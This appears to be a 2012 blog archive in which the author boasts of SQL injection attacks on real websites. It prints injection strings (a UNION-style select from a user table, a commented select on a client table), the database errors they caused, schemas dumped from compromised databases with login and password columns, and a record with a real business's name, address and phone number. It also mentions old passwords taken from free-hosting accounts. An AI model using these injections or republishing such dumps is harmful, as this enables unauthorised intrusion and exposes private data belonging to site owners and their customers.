Showing posts from February, 2012 | Sql injections, data leak, system compromise

Since the website has been closed (I'm sorry for that).

Some (old) information.

***Remember that I've never abused any website or modified anything or used confidential data.***

';%20trunca

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query

/inc_ricerca.htm, line 12

--------------'0'9'9,1,2,3,6,4,4,5%20from%20user,%20name,%20'','','','','',''… | sql data dump, data leak

Too much data to dump. Anyway I've deleted everything (here ... ).
--- samples ---

CREATE TABLE company_address (
  company_id bigint(3) NOT NULL auto_increment,
  company_name varchar(200) NOT NULL default '',
  address longtext,
  street_id bigint(3) default NULL,
  city_id bigint(3) default NULL,
  state_id bigint(3) default NULL,
  zip varchar(20) default NULL,
  phone varchar(20) NOT NULL default '0',
  fax varchar(20) default NULL,
  email varchar(100) default NULL,
  category char(1) NOT NULL default '',
  PRIMARY KEY  (company_id)
);

INSERT INTO company_address VALUES("1", "M & A Hispanic Book Store", "1902 Bergenline Ave", "0", "16284", "30", "07087", "(201) 866-0010", "", "", "0");

------------------------------------------ (??? google ???) | sql data dump, data leak

I found this data some time ago...

CREATE TABLE partners (
  id int(11) NOT NULL auto_increment,
  email varchar(255) NOT NULL default '',
  phone varchar(50) default NULL,
  fax varchar(50) default NULL,
  address varchar(255) default NULL,
  zip varchar(20) default NULL,
  city varchar(50) default NULL,
  state varchar(50) default NULL,
  country varchar(50) default NULL,
  first_name varchar(100) default NULL,
  last_name varchar(100) default NULL,
  company_name varchar(100) default NULL,
  login varchar(25) NOT NULL default '',
  password varchar(25) NOT NULL default '',
  additional_data text,
  ku_balance float(16,2) unsigned NOT NULL default '0.00',
  us_balance float(16,2) unsigned NOT NULL default '0.00',
  credit_limit float(10,2) default '0.00',
  status enum('unconfirmed','active','suspended','free') default 'unconfirmed',
  promo varchar(100) default NULL,
  partner_group varchar(40… | Sql injection, data leak (sql dumps), system compromise

the website is dead so ... I can publish something

The main table

nurseryinfo (
   Title text,
   Initial text,
   First_Name text,
   Surname text,
   Contact_Name text,
   Position text,
   Nursery text,
   Address text,
   Address1 text,
   Town text,
   County text,
   Postcode text,
   Tel_No text,
   No_0_2 text,
   Range text,
   Weekly text,
   Tot_Staff text,
   Group_No text,
   Facility text,
   Member_No text,
   Branch text,
   Region text,
   Officer_Br text,
   Officer_Re text,
   Officer_Ex text,
   Year_Joined text,
   Eig text,
   Contact text,
   Task_Group text,
   _998 text,
   No_of_Nurs text,
   So text,
   Fax_No text,
   Renewed text,
   Bulletin text,
   E_Mail text,
   Mem_Type text,
   Fees_Paid text,
   Paid text,
   Month_Join text,
   Membership text,
   NDNA text,
   Chair text,
   Regional_R text,
   Chairtel_N text,
   Rep_Tel_No text,
   Ass text,
   Primary_ text,
   Add_site text,
   Head_offic text,
   No_2_3 int(11),
   No_3_5 int(11),
   No_5 in… | SQL Injection

Since the injection was fixed some time ago ... I am just publishing some samples (nothing confidential)

Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1

/ita/web/index.asp, line 15

db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono

sample injection*%20from%20Sql39909_2.clienti/*&menu=Newa

old hosts (2003/2004?)…

old joe accounts of free websites

Old accounts, dead websites, old passwd